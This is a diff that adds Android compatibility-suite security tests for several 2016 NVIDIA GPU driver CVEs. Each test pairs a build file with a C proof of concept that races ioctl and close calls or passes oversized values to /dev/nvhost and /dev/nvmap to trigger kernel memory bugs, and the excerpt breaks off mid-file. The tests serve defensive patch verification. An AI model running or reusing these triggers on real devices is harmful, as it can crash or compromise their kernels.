+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
